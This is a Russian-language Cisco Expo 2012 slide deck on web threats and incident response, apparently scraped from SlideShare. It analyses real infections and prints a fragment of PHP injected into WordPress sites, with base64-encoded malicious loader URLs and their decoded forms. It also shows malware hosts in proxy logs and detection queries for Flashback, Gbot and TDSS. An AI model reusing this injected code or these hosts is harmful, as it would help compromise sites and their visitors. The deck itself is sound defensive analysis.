SlideShare a Scribd company logo
1 of 60
Download to read offline
Cisco Expo
                                                           2012


Состояние Web
безопасности: атака и
реагирование
  Павел Родионов
    Systems Engineer, Security




© 2011 Cisco and/or its affiliates. All rights reserved.                1
                                                                            1
•  Ландшафт и тенденции Web угроз

                         •  Реальные инциденты

                         •  Мониторинг безопасности и реагирование на инциденты




© 2011 Cisco and/or its affiliates. All rights reserved.                          2
                                                                                      2
Web браузеры – это не единственная цель,
вся экосистема под угрозой




© 2011 Cisco and/or its affiliates. All rights reserved.   3
2009

                     “70 процентов из 100 [интернет] узлов или содержат вредоносный контент или содержат
                       замаскированный переход для того, чтобы перенаправить ничего не подозревающую
                         жертву с легитимных узлов на вредоносные сайты… Волны целевых email атак…
                     эксплуатируют уязвимости на стороне клиента таких широко используемых программ как
                              Adobe PDF Reader, Java, QuickTime, Adobe Flash и Microsoft Office.
                         Те же уязвимости эксплуатируются атакущими, которые инфицируют посетителей
                                                  небезопасных вебсайтов…”




                      Source: Websense “State of Internet Security, Q3-Q4”, 2008.



© 2011 Cisco and/or its affiliates. All rights reserved.                                             4
                                                                                                           4
2010
                      •              Websense Security Labs идентифицировала увеличение количества
                                     вредоносных сайтов на 111.4% в период с 2009 до 2010
                      •              79.9% веб узлов с вредоносным кодом были скомпрометированными
                                     легитимными вебсайтами.
                      •              Поиск ярких событий и текущих новостей приводит к большему риску (22.4%)
                                     чем поиск по «спорному» содержимому (21.8%).
                      •              В 2010 США были на первом месте по распространению и хостингу malware .




                                        Source: Websense 2010 Threat Report



© 2011 Cisco and/or its affiliates. All rights reserved.                                                        5
                                                                                                                    5
2011
                      •              “…количество уязвимостей, которые атакуют конечные узлы утроилось, при
                                     этом большая часть из них (78%) найдена в не-Microsoft программах. Их
                                     сложнее пропатчить из-за необходимости работы нескольких механизмов.”
                      •              “72% уязвимостей закрываются патчем, доступным в день раскрытия данных об
                                     уязвимости.”
                      •              “50% пользователей используют более 66 программ от более чем 22 разных
                                     вендоров.”




                                          Source: Secunia Yearly Report 2011.



© 2011 Cisco and/or its affiliates. All rights reserved.                                                         6
                                                                                                                     6
2012
                      •              Количество вредоносных доменов увеличилось на 27% с 2011 по 2012 и на 47%
                                     с 2010 по 2011.
                      •              В среднем в 2011 году в месяц обнаруживалось 20,141 уникальных хостов c
                                     Web malware, в то время как то же значение в 2010 было 14,217.
                      •              Во время 4Q11, 33% встреченного Web malware было zero-day malwarе, которое
                                     не могло быть обнаружено с помощью традиционных методик обнаружения
                                     сигнатурными сканерами.




                                   Source: Cisco Global Threat Report Q42011.



© 2011 Cisco and/or its affiliates. All rights reserved.                                                          7
                                                                                                                      7
https://browsercheck.qualys.com




© 2011 Cisco and/or its affiliates. All rights reserved.   8
                                                               8
Source: “The Inconvenient Truth About the State of Browser Security”, 2011. Wolfgang Kandek, CTO Qualys, Inc.



© 2011 Cisco and/or its affiliates. All rights reserved.                                                                              9
                                                                                                                                          9
© 2011 Cisco and/or its affiliates. All rights reserved.   10
                                                                10
“В долгорочной перспективе более 60% Java
                                              инстялляций никогда не поддерживаются в
                                              «свежем» состоянии. Поскольку такое количество
                                              компьютеров не обновлено, даже старые эксплиты
                                              могут использоваться для компрометации жертв.

                                              …Мы обнаружили, что во время первого месяца
                                              после выпуска патче, уровень адаптации не
                                              превышает 10%. Через 2 месяца, примерно 20%
                                              устанавливают патчи и через 3 месяца 30%. Мы
                                              определили, что самый высокий уровень установки
                                              патчей был 38% с Java Version 6 Update 26 через
                                              три месяца после релиза.”

                                                                                        - Marcus Carey, Rapid7



        Source: Krebs on Security “New Java Attack Rolled into Exploit Packs”. March,
                                          2012.


© 2011 Cisco and/or its affiliates. All rights reserved.                                                         11
                                                                                                                      11
•  Обнаружена – 27 августа 2012 года

•  Анализ -- http://www.deependresearch.org/2012/08/java-7-0-day-
      vulnerability-information.html
•  Впервые сообщено об аналогичной уязвимости – 10 августа 2012
      года Марком Вуглером
•  Oracle выпустил update 7 (7u7), который исправляет эту уязвимость




© 2011 Cisco and/or its affiliates. All rights reserved.               12
                                                                            12
Как это работает

                         •  Зашифрованный javascript в index.html
                         •  Уязвимость атакует Java 7 (1.7) Update 0 до 6. Не атакует
                            Java 6 и ниже
                         •  Работает на всех браузерах, в том числе и Google Chrome
                         •  Не оказывает видимого влияния на работу браузеров
                         •  При загрузке вредоносного кода, если система не уязвима,
                                 атака останавливается. С точки зрения пользователя
                                 невозможно сказать, была ли атака успешной, или же нет.
                         •  Если атака успешна, она загружает и выполняет
                                 вредоносный двоичный код, который вызывается с другого
                                 DNS/IP hello.icon.pk / 223.25.233.244




© 2011 Cisco and/or its affiliates. All rights reserved.                                   13
                                                                                                13
Как отреагировала Cisco?




© 2011 Cisco and/or its affiliates. All rights reserved.   14
                                                                14
© 2011 Cisco and/or its affiliates. All rights reserved.   15
                                                                15
© 2011 Cisco and/or its affiliates. All rights reserved.   16
                                                                16
© 2011 Cisco and/or its affiliates. All rights reserved.   17
                                                                17
© 2011 Cisco and/or its affiliates. All rights reserved.   18
                                                                18
© 2011 Cisco and/or its affiliates. All rights reserved.   19
DLL инъекция из Web

                                                                                             •  “После захвата всех
                                                                                               необходимых привилегий на
                                                                                               компьютере жертвы, эксполит
                                                                                               не устанавливает
                                                                                               вредоносный код на жесткий
                                                                                               диск с использованием Java.
                                                                                             •  Вместо этого он инъектирует
                                                                                               зашифрованный DLL прямо в
                                                                                               память процесса jawaw.exe. “




            Source: Sergey Golovanov “A unique ‘fileless’ bot attacks news site visitors’.
                                         March, 2012.


© 2011 Cisco and/or its affiliates. All rights reserved.                                                                      20
                                                                                                                                   20
DLL инъекция из Web

                                                                                             “В процессе исследования мы
                                                                                             определии, что киберпреступники
                                                                                             использовали учетную запись
                                                                                             клиента AdFox для изменения
                                                                                             кода одного из баннеров и
                                                                                             добавили туда перенаправление
                                                                                             iframe на вредоносный сайт.


                                                                                             После модификации кода они
                                                                                             смогли атаковать пользователей
                                                                                             не только новостного сайта, но
                                                                                             также посетителей других
                                                                                             ресурсов, которые размещали
                                                                                             этот баннер. Как результат могли
                                                                                             быть атакованы десятки тысяч
                                                                                             пользователей. В то же самое
                                                                                             время баннеры других клиентов
                                                                                             AdFox вредоносного кода не
                                                                                             содержали.”
            Source: Sergey Golovanov “A unique ‘fileless’ bot attacks news site visitors’.
                                         March, 2012.


© 2011 Cisco and/or its affiliates. All rights reserved.                                                                        21
                                                                                                                                     21
JAR файл атакует загрузкойCVE-2011-3544

                                                           •  Пакетный анализатор создал
                                                             JAR файл для анализа malware
                                                           •  При помощью поиска в web
                                                             лог-файлах мы нашли Java
                                                             User-Agent, загружающий
                                                             двоичные файлы, мы затем
                                                             отследили направляющий URL
                                                           •  Популярные новостные сайты
                                                             в Бангалоре направляли своих
                                                             читателей через встроенный
                                                             Javascript на рекламу с
                                                             вредоносным Jar файлом.
                                                           •  Загрузка варианта Zeus bot




© 2011 Cisco and/or its affiliates. All rights reserved.                                   22
                                                                                                22
© 2011 Cisco and/or its affiliates. All rights reserved.   23
                                                                23
•  Сотни имен для хоста,
                                 который размещает файл
                         •  Загружен бот Zeus

                         •  Загрузена конфигурация бота

                         •  Собрана информация




© 2011 Cisco and/or its affiliates. All rights reserved.   24
                                                                24
Запрос URL: http://users9.nofeehost.com/patrickkeed/all.bin




© 2011 Cisco and/or its affiliates. All rights reserved.                             25
                                                                                          25
Инъекция в Wordpress и его
последствия




                                                                2
© 2011 Cisco and/or its affiliates. All rights reserved.   26
© 2011 Cisco and/or its affiliates. All rights reserved.   27
                                                                27
Внутренние клиенты запросили 650+ уникальных
                                      URL за две недели.

                                      Запрошен широкий диапазон доменов и URL:




© 2011 Cisco and/or its affiliates. All rights reserved.                             28
                                                                                          28
http://www.vfwpost7383.org/




© 2011 Cisco and/or its affiliates. All rights reserved.                          29
                                                                                       29
© 2011 Cisco and/or its affiliates. All rights reserved.   30
                                                                30
…$_SERVER['s_p1']=$mz; $_SERVER['s_b1']=$bot;
                                     $_SERVER['s_t1']=1200;
                                     $_SERVER['s_d1']=base64_decode('aHR0cDovL2VuczEy
                                     Mnp6emRkYXp6LmNvbS8='); $d='?
                                     d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencod
                                     e($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER[
                                     "HTTP_USER_AGENT"]);
                                     $_SERVER['s_a1']=base64_decode('aHR0cDovL2Nvb3Bl
                                     cmpzdXRmOC5ydS9nX2xvYWQucGhw').$d;
                                     $_SERVER['s_a2']=base64_decode('aHR0cDovL25saW5
                                     0aGV3b29kLmNvbS9nX2xvYWQucGhw').$d;
                                     $_SERVER['s_script']="nl.php?p=d";…




© 2011 Cisco and/or its affiliates. All rights reserved.                                   31
                                                                                                31
aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8=

                        http://ens122zzzddazz.com

                        aHR0cDovL2Nvb3BlcmpzdXRmOC5ydS9nX2xvYWQucGhw’

                        http://cooperjsutf8.ru/g_load.php

                        aHR0cDovL25saW50aGV3b29kLmNvbS9nX2xvYWQucGhw

                        http://nlinthewood.com/g_load.php




© 2011 Cisco and/or its affiliates. All rights reserved.                32
                                                                             32
1332868923.052 129 10.1.2.3 TCP_DENIED/403 419 GET http://
             smains29treamsp.rr.nu/nl.php?p=d BLOCK_WBRS -8.8 "Mozilla/5.0 (Macintosh;
             Intel Mac OS X 10.6; rv:10.0.2) Gecko/20100101 Firefox/10.0.2" Referrer="http://
             www.vfwpost7383.org/"




                       1332512746.272 195 10.1.2.14 TCP_DENIED/403 419 GET http://
                       pfo42rest.rr.nu/nl.php?p=d BLOCK_WBRS -8.6 "Mozilla/4.0 (compatible; MSIE
                       8.0; Windows NT 6.1; WOW64; Trident/4.0; PredictYourBabySearchToolbar 1.2)"
                       Referrer="http://www.vfwpost7383.org/"




           1332868632.124 219 10.1.2.98 TCP_DENIED/403 419 GET http://
           ste07rda.rr.nu/nl.php?p=d BLOCK_WBRS -8.8 "Mozilla/5.0 (Macintosh; Intel
           Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/
           17.0.963.83 Safari/535.11" Referrer="http://www.vfwpost7383.org/"


© 2011 Cisco and/or its affiliates. All rights reserved.                                         33
                                                                                                      33
© 2011 Cisco and/or its affiliates. All rights reserved.   34
                                                                34
Троян Macintosh OSX
Flashback




                                                                3
© 2011 Cisco and/or its affiliates. All rights reserved.   35
© 2011 Cisco and/or its affiliates. All rights reserved.   36
                                                                36
© 2011 Cisco and/or its affiliates. All rights reserved.   37
                                                                37
Flashback user-agent query (2nd and 3rd variants):

                      (auupdate OR scheck OR owncheck) AND (cs_url="*/scheck/*" OR cs_url="*/auupdate/*" OR cs_url="*/owncheck/*") | regex
                      cs_useragent="(^[MN][Djz][BFJNRVZdhl][8][a][T][M][4][N][n])|(^[MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl]
                      [012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz]
                      [AEIMQUYcgk][t][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][CSiy][01]
                      [012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][L][TU]
                      [ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][AEIMQUYcgk][t][MNOQR][0DETUjkz]
                      [ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz]
                      [MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl]
                      [012345BCDEFGwxyz])"




© 2011 Cisco and/or its affiliates. All rights reserved.                                                                             38
                                                                                                                                          38
Flashback user-agent query (1st variant):
                       NOT cs_referer="*” AND (cs_url="*/scheck/*" OR cs_url="*/owncheck/*") | regex cs_useragent="id:([A-Za-z0-9]){8}-([A-Za-z0-9])
                       {4}-([A-Za-z0-9]){4}-([A-Za-z0-9]){4}-([A-Za-z0-9]){12}"



                       Gbot query: cs_method="GET" cs_url=*jpg?v* cs_url="*tq=*"


                       TDSS query: (cs_url="*2xrP*") | regex cs_url="/.{17}2xrP"




© 2011 Cisco and/or its affiliates. All rights reserved.                                                                                       39
                                                                                                                                                    39
Взлом сайтов
госорганизаций




                                                                4
© 2011 Cisco and/or its affiliates. All rights reserved.   40
Заблокирован репутационной системой Cisco




© 2011 Cisco and/or its affiliates. All rights reserved.         41
Заблокирован репутационной системой Cisco




© 2011 Cisco and/or its affiliates. All rights reserved.             42
Почему?

                   •  Безобидный скрипт http://
                          www.fmsmoscow.ru/js/
                          lightbox.js
                   •  Функция скрипта – оверлеинг
                          изображений
                   •  Скрипт модифицирован для
                          перенаправления на
                          вредоносные узлы и загрузки
                          malware




© 2011 Cisco and/or its affiliates. All rights reserved.   43
                                                                43
Почему?




© 2011 Cisco and/or its affiliates. All rights reserved.   44
                                                                44
© 2011 Cisco and/or its affiliates. All rights reserved.   45
§  Один день глобального трафика Cisco
§  HTTP -- 25% всего трафика (SSL + 6%)
§  12.5TB
© 2011 Cisco and/or its affiliates. All rights reserved.   47
                                                                47
Web Based Reputation System (WBRS)

                          Bad - Block                                                Neutral – AV Scan                       Good - Allow
           -10




                                                                                                                                            10
                       -9

                                    -8

                                                -7

                                                           -6

                                                                -5

                                                                     -4

                                                                          -3

                                                                               -2

                                                                                    -1

                                                                                         0

                                                                                               1

                                                                                                     2

                                                                                                         3

                                                                                                             4

                                                                                                                 5

                                                                                                                     6

                                                                                                                         7

                                                                                                                               8

                                                                                                                                     9
© 2011 Cisco and/or its affiliates. All rights reserved.                                                                                         48
                                                                                                                                                      48
© 2011 Cisco and/or its affiliates. All rights reserved.   49
                                                                49
Выборы, выборы…

                         •  Создан сайт www.vybory2012.gov.ua
                         •  При создании сайта использовались адреса из блока




© 2011 Cisco and/or its affiliates. All rights reserved.                        50
                                                                                     50
Выборы, выборы…

                         •  Новый домен, IP в blocklist – репутация -6.3
                         •  Через неделю репутация -5.4. Домен не новый, но IP адрес
                                 все еще в блоклистах




© 2011 Cisco and/or its affiliates. All rights reserved.                               51
                                                                                            51
© 2011 Cisco and/or its affiliates. All rights reserved.   52
                                                                52
© 2011 Cisco and/or its affiliates. All rights reserved.   53
                                                                53
© 2011 Cisco and/or its affiliates. All rights reserved.   54
                                                                54
© 2011 Cisco and/or its affiliates. All rights reserved.   55
                                                                55
GET / HTTP/1.1                                       What the client requests from the web
1         Host: ihaveabadreputation.com
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

          Accept-Language: en-us,en;q=0.5
          Accept-Encoding: gzip, deflate
          Connection: keep-alive



          HTTP/1.1 403 Forbidden                                          What the client gets back from the proxy
          Mime-Version: 1.0

          Date: Thu, 12 Apr 2012 18:38:03 GMT
          Content-Type: text/html
2         Connection: keep-alive
                                                                                                                     http://wwwintranet.cisco.com/blocked-page.shtml
          Content-Length: 267
                                                                                                               3     GET /blocked-page.shtml HTTP/1.1
                                                                                                                     Host: wwwintranet.cisco.com
                                                                                                                     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
                                                                                                                     10.6; rv:11.0) Gecko/20100101 Firefox/11.0
                                                                                                                     Accept: text/html,application/xhtml+xml,application/
                                                                                                                     xml;q=0.9,*/*;q=0.8
                                                                                                                     Accept-Language: en-us,en;q=0.5
                                                                                                                     Accept-Encoding: gzip, deflate
                                                                                                                     Connection: keep-alive
                                                                                                                     HTTP/1.1 200     OK




    © 2011 Cisco and/or its affiliates. All rights reserved.                                                                                                                56
                                                                                                                                                                                 56
В качестве резюме:

                                      •  Браузер – уже не цель, под риском находится вся the
                                         экосистема.

                                      •  Пакеты эксплоитов заполнены эффективными плагинами
                                         и часто содержат атаки - дня. Антивирусы хорошо
                                         защищают от старых атак, но остается громадное окно
                                         для работы эксплоитов.

                                      •  Нужно базовое образование безопасности
                                          - любопытство приводит людей к эксплоитом
                                          - нет стремления к исправлению и фактор
                                      неопределенности

                                      •  Инвестируйте в исследования, автоматизация на
                                         сетевом уровне и уровне приложений (патчинг/AV)
                                         поможет защитить организацию
                                           - гибкость бизнеса с IT
                                           - не полагайтесь на рутинный человеческий фактор
                                           - включайте глубокое расследование



© 2011 Cisco and/or its affiliates. All rights reserved.                                       57
                                                                                                    57
Золотые правила выживания в
                                                           сетевых джунглях

                                   •  Регулярно обновляйте свои ОС и приложения, особенно Java, Adobe
                                      и офисные продукты
                                   •  Используйте современные браузеры и рассматривайте плагины,
                                      которые позволяеют отключить скрипты/Java/Flash и другие общие
                                      пути для атаки браузера
                                   •  Используйте разные пароли для разных областей жизни: один для
                                      почты, один для финансовых транзакций, один для социальных
                                      приложений и т.д.
                                   •  Следите за балансом на кредитной карте, регулярно его проверяйте;
                                      Включите смс-банкинг
                                   •  Используйте и регулярно обновляйте антивирус
                                   •  Используйте программный или аппаратный firewall
                                   •  Берегитесь коротких, странных твитов, обновлений Facebook и
                                      других социальных сетей, даже от друзей, которые содержат ссылку.
                                   •  Используйте шифрование и делайте резервные копии всего так
                                      часто, как вы можете это себе позволить.
                          Source: Steve Santorelli. Cymru Quarterly. March 2012.



© 2011 Cisco and/or its affiliates. All rights reserved.                                                  58
                                                                                                               58
Золотые правила
                                                           (для реагирования на инциденты)
                              •  Разработайте точную и регулярно обновляемую систему записей для
                                 идентификации адреса, хост и команду по работе с приложением
                              •  Внедрите систему сбора логов везде, где это возможно для
                                 максимизации собираемой информации и проведения
                                 расследований
                              •  Внедрите систему индексации и поиска и построения отчетов для
                                 того, чтобы работать с «большими» данными
                              •  Разработайте и поддерживаейте гибкую стратегию обновления,
                                 включая своевременные уведомления, правильную контактную
                                 информацию и планы по выполнению.
                              •  Записывайте все и все возможное в сети до тех пор, пока вы это
                                 можете хранить и искать
                              •  Разрешите разработку, исследования, открытие дискуссии и обмен
                                 информацией с экспертами



© 2011 Cisco and/or its affiliates. All rights reserved.                                           59
                                                                                                        59
Thank you.




             6

More Related Content

What's hot

Сетевая безопасность: две стороны одной медали
Сетевая безопасность: две стороны одной медалиСетевая безопасность: две стороны одной медали
Сетевая безопасность: две стороны одной медалиКРОК
 
Кибербезопасность в России. Исследование
Кибербезопасность в России. ИсследованиеКибербезопасность в России. Исследование
Кибербезопасность в России. ИсследованиеCisco Russia
 
Cisco Social Network Security
Cisco Social Network SecurityCisco Social Network Security
Cisco Social Network SecurityCisco Russia
 
Программы-вымогатели: многоуровневая защита для блокирования хакерских атак
Программы-вымогатели: многоуровневая защита для блокирования хакерских атакПрограммы-вымогатели: многоуровневая защита для блокирования хакерских атак
Программы-вымогатели: многоуровневая защита для блокирования хакерских атакCisco Russia
 
Модель обеспечения ИБ «ДО – ВО ВРЕМЯ – ПОСЛЕ»
Модель обеспечения ИБ «ДО – ВО ВРЕМЯ – ПОСЛЕ»Модель обеспечения ИБ «ДО – ВО ВРЕМЯ – ПОСЛЕ»
Модель обеспечения ИБ «ДО – ВО ВРЕМЯ – ПОСЛЕ»Cisco Russia
 
Контрольный список для предотвращения атак программ-вымогателей
Контрольный список для предотвращения атак программ-вымогателейКонтрольный список для предотвращения атак программ-вымогателей
Контрольный список для предотвращения атак программ-вымогателейCisco Russia
 
Охват всего периода атаки: до, во время и после
Охват всего периода атаки: до, во время и послеОхват всего периода атаки: до, во время и после
Охват всего периода атаки: до, во время и послеCisco Russia
 
Практика исследований защищенности российксих компаний (CISCO CONNECT 2017)
Практика исследований защищенности российксих компаний (CISCO CONNECT 2017)Практика исследований защищенности российксих компаний (CISCO CONNECT 2017)
Практика исследований защищенности российксих компаний (CISCO CONNECT 2017)Alexey Kachalin
 
Выявление и нейтрализация целенаправленных атак и совершенно новых угроз с по...
Выявление и нейтрализация целенаправленных атак и совершенно новых угроз с по...Выявление и нейтрализация целенаправленных атак и совершенно новых угроз с по...
Выявление и нейтрализация целенаправленных атак и совершенно новых угроз с по...Cisco Russia
 
What every cio should know about security
What every cio should know about securityWhat every cio should know about security
What every cio should know about securityAleksey Lukatskiy
 
Palo Alto Networks. Евгений Кутумин. "Платформа Palo Alto Networks для защиты...
Palo Alto Networks. Евгений Кутумин. "Платформа Palo Alto Networks для защиты...Palo Alto Networks. Евгений Кутумин. "Платформа Palo Alto Networks для защиты...
Palo Alto Networks. Евгений Кутумин. "Платформа Palo Alto Networks для защиты...Expolink
 
Годовой отчет Cisco по безопасности за 2016 год - данные по региону
Годовой отчет Cisco по безопасности за 2016 год - данные по регионуГодовой отчет Cisco по безопасности за 2016 год - данные по региону
Годовой отчет Cisco по безопасности за 2016 год - данные по регионуCisco Russia
 
доктор веб: информационная безопасность. типичные ошибки
доктор веб: информационная безопасность. типичные ошибки   доктор веб: информационная безопасность. типичные ошибки
доктор веб: информационная безопасность. типичные ошибки Expolink
 
Алексей Лукацкий. Основные сценарии реализации угроз ​на АСУ ТП и их преломле...
Алексей Лукацкий. Основные сценарии реализации угроз ​на АСУ ТП и их преломле...Алексей Лукацкий. Основные сценарии реализации угроз ​на АСУ ТП и их преломле...
Алексей Лукацкий. Основные сценарии реализации угроз ​на АСУ ТП и их преломле...Kaspersky
 
Web vulnerabilities-2018
Web vulnerabilities-2018Web vulnerabilities-2018
Web vulnerabilities-2018malvvv
 
Лаборатория Касперского: Внутренние и внешние издержки и их критерии в общей ...
Лаборатория Касперского: Внутренние и внешние издержки и их критерии в общей ...Лаборатория Касперского: Внутренние и внешние издержки и их критерии в общей ...
Лаборатория Касперского: Внутренние и внешние издержки и их критерии в общей ...Expolink
 
Positive Hack Days. Гостев. Киберпреступность: вчера, сегодня, завтра…
Positive Hack Days. Гостев. Киберпреступность: вчера, сегодня, завтра…Positive Hack Days. Гостев. Киберпреступность: вчера, сегодня, завтра…
Positive Hack Days. Гостев. Киберпреступность: вчера, сегодня, завтра…Positive Hack Days
 
Russian CSO Summit 2011 - 1 - RUSSIAN
Russian CSO Summit 2011 - 1 - RUSSIANRussian CSO Summit 2011 - 1 - RUSSIAN
Russian CSO Summit 2011 - 1 - RUSSIANKirill Kertsenbaum
 
МСЭ нового поколения, смотрящий глубже и шире
МСЭ нового поколения, смотрящий глубже и ширеМСЭ нового поколения, смотрящий глубже и шире
МСЭ нового поколения, смотрящий глубже и ширеCisco Russia
 
VMware Forum Moscow 2012 - Security for Virtualization trends in Russia - RUS...
VMware Forum Moscow 2012 - Security for Virtualization trends in Russia - RUS...VMware Forum Moscow 2012 - Security for Virtualization trends in Russia - RUS...
VMware Forum Moscow 2012 - Security for Virtualization trends in Russia - RUS...Kirill Kertsenbaum
 

What's hot (20)

Сетевая безопасность: две стороны одной медали
Сетевая безопасность: две стороны одной медалиСетевая безопасность: две стороны одной медали
Сетевая безопасность: две стороны одной медали
 
Кибербезопасность в России. Исследование
Кибербезопасность в России. ИсследованиеКибербезопасность в России. Исследование
Кибербезопасность в России. Исследование
 
Cisco Social Network Security
Cisco Social Network SecurityCisco Social Network Security
Cisco Social Network Security
 
Программы-вымогатели: многоуровневая защита для блокирования хакерских атак
Программы-вымогатели: многоуровневая защита для блокирования хакерских атакПрограммы-вымогатели: многоуровневая защита для блокирования хакерских атак
Программы-вымогатели: многоуровневая защита для блокирования хакерских атак
 
Модель обеспечения ИБ «ДО – ВО ВРЕМЯ – ПОСЛЕ»
Модель обеспечения ИБ «ДО – ВО ВРЕМЯ – ПОСЛЕ»Модель обеспечения ИБ «ДО – ВО ВРЕМЯ – ПОСЛЕ»
Модель обеспечения ИБ «ДО – ВО ВРЕМЯ – ПОСЛЕ»
 
Контрольный список для предотвращения атак программ-вымогателей
Контрольный список для предотвращения атак программ-вымогателейКонтрольный список для предотвращения атак программ-вымогателей
Контрольный список для предотвращения атак программ-вымогателей
 
Охват всего периода атаки: до, во время и после
Охват всего периода атаки: до, во время и послеОхват всего периода атаки: до, во время и после
Охват всего периода атаки: до, во время и после
 
Практика исследований защищенности российксих компаний (CISCO CONNECT 2017)
Практика исследований защищенности российксих компаний (CISCO CONNECT 2017)Практика исследований защищенности российксих компаний (CISCO CONNECT 2017)
Практика исследований защищенности российксих компаний (CISCO CONNECT 2017)
 
Выявление и нейтрализация целенаправленных атак и совершенно новых угроз с по...
Выявление и нейтрализация целенаправленных атак и совершенно новых угроз с по...Выявление и нейтрализация целенаправленных атак и совершенно новых угроз с по...
Выявление и нейтрализация целенаправленных атак и совершенно новых угроз с по...
 
What every cio should know about security
What every cio should know about securityWhat every cio should know about security
What every cio should know about security
 
Palo Alto Networks. Евгений Кутумин. "Платформа Palo Alto Networks для защиты...
Palo Alto Networks. Евгений Кутумин. "Платформа Palo Alto Networks для защиты...Palo Alto Networks. Евгений Кутумин. "Платформа Palo Alto Networks для защиты...
Palo Alto Networks. Евгений Кутумин. "Платформа Palo Alto Networks для защиты...
 
Годовой отчет Cisco по безопасности за 2016 год - данные по региону
Годовой отчет Cisco по безопасности за 2016 год - данные по регионуГодовой отчет Cisco по безопасности за 2016 год - данные по региону
Годовой отчет Cisco по безопасности за 2016 год - данные по региону
 
доктор веб: информационная безопасность. типичные ошибки
доктор веб: информационная безопасность. типичные ошибки   доктор веб: информационная безопасность. типичные ошибки
доктор веб: информационная безопасность. типичные ошибки
 
Алексей Лукацкий. Основные сценарии реализации угроз ​на АСУ ТП и их преломле...
Алексей Лукацкий. Основные сценарии реализации угроз ​на АСУ ТП и их преломле...Алексей Лукацкий. Основные сценарии реализации угроз ​на АСУ ТП и их преломле...
Алексей Лукацкий. Основные сценарии реализации угроз ​на АСУ ТП и их преломле...
 
Web vulnerabilities-2018
Web vulnerabilities-2018Web vulnerabilities-2018
Web vulnerabilities-2018
 
Лаборатория Касперского: Внутренние и внешние издержки и их критерии в общей ...
Лаборатория Касперского: Внутренние и внешние издержки и их критерии в общей ...Лаборатория Касперского: Внутренние и внешние издержки и их критерии в общей ...
Лаборатория Касперского: Внутренние и внешние издержки и их критерии в общей ...
 
Positive Hack Days. Гостев. Киберпреступность: вчера, сегодня, завтра…
Positive Hack Days. Гостев. Киберпреступность: вчера, сегодня, завтра…Positive Hack Days. Гостев. Киберпреступность: вчера, сегодня, завтра…
Positive Hack Days. Гостев. Киберпреступность: вчера, сегодня, завтра…
 
Russian CSO Summit 2011 - 1 - RUSSIAN
Russian CSO Summit 2011 - 1 - RUSSIANRussian CSO Summit 2011 - 1 - RUSSIAN
Russian CSO Summit 2011 - 1 - RUSSIAN
 
МСЭ нового поколения, смотрящий глубже и шире
МСЭ нового поколения, смотрящий глубже и ширеМСЭ нового поколения, смотрящий глубже и шире
МСЭ нового поколения, смотрящий глубже и шире
 
VMware Forum Moscow 2012 - Security for Virtualization trends in Russia - RUS...
VMware Forum Moscow 2012 - Security for Virtualization trends in Russia - RUS...VMware Forum Moscow 2012 - Security for Virtualization trends in Russia - RUS...
VMware Forum Moscow 2012 - Security for Virtualization trends in Russia - RUS...
 

Similar to Актуально про веб-безопасность – угрозы и реагирование.

Сеть как средство защиты и реагирования на угрозы
Сеть как средство защиты и реагирования на угрозыСеть как средство защиты и реагирования на угрозы
Сеть как средство защиты и реагирования на угрозыCisco Russia
 
Новые тенденции и новые технологии на рынке ИБ
Новые тенденции и новые технологии на рынке ИБНовые тенденции и новые технологии на рынке ИБ
Новые тенденции и новые технологии на рынке ИБAleksey Lukatskiy
 
Устранение веб-угроз с помощью комплексных средств безопасности
Устранение веб-угроз с помощью комплексных средств безопасностиУстранение веб-угроз с помощью комплексных средств безопасности
Устранение веб-угроз с помощью комплексных средств безопасностиCisco Russia
 
Cisco AMP: платформа для борьбы с вредоносным кодом
Cisco AMP: платформа для борьбы с вредоносным кодомCisco AMP: платформа для борьбы с вредоносным кодом
Cisco AMP: платформа для борьбы с вредоносным кодомCisco Russia
 
Cisco ASA with FirePOWER Services
Cisco ASA with FirePOWER ServicesCisco ASA with FirePOWER Services
Cisco ASA with FirePOWER ServicesCisco Russia
 
Угрозы меняются! Как все время быть начеку?
Угрозы меняются! Как все время быть начеку?Угрозы меняются! Как все время быть начеку?
Угрозы меняются! Как все время быть начеку?Cisco Russia
 
Как превратить свою сеть в систему информационной безопасности
Как превратить свою сеть в систему информационной безопасности Как превратить свою сеть в систему информационной безопасности
Как превратить свою сеть в систему информационной безопасности Cisco Russia
 
Один зеродей и тысяча ночей без сна
Один зеродей и тысяча ночей без снаОдин зеродей и тысяча ночей без сна
Один зеродей и тысяча ночей без снаAleksey Lukatskiy
 
Подробный обзор Cisco ASA with FirePOWER Services
Подробный обзор Cisco ASA with FirePOWER ServicesПодробный обзор Cisco ASA with FirePOWER Services
Подробный обзор Cisco ASA with FirePOWER ServicesCisco Russia
 
Cisco Advanced Malware Protection для руководителей, принимающих решения
Cisco Advanced Malware Protection для руководителей, принимающих решенияCisco Advanced Malware Protection для руководителей, принимающих решения
Cisco Advanced Malware Protection для руководителей, принимающих решенияCisco Russia
 
Годовой отчет Cisco по безопасности за 2014 год
Годовой отчет Cisco по безопасности за 2014 годГодовой отчет Cisco по безопасности за 2014 год
Годовой отчет Cisco по безопасности за 2014 годCisco Russia
 
Годовой отчет Cisco по безопасности за 2014 год
Годовой отчет Cisco по безопасности за 2014 годГодовой отчет Cisco по безопасности за 2014 год
Годовой отчет Cisco по безопасности за 2014 годCisco Russia
 
Cisco Cyber Threat Defense
Cisco Cyber Threat DefenseCisco Cyber Threat Defense
Cisco Cyber Threat DefenseCisco Russia
 
Анализ защищенности интернет-проектов
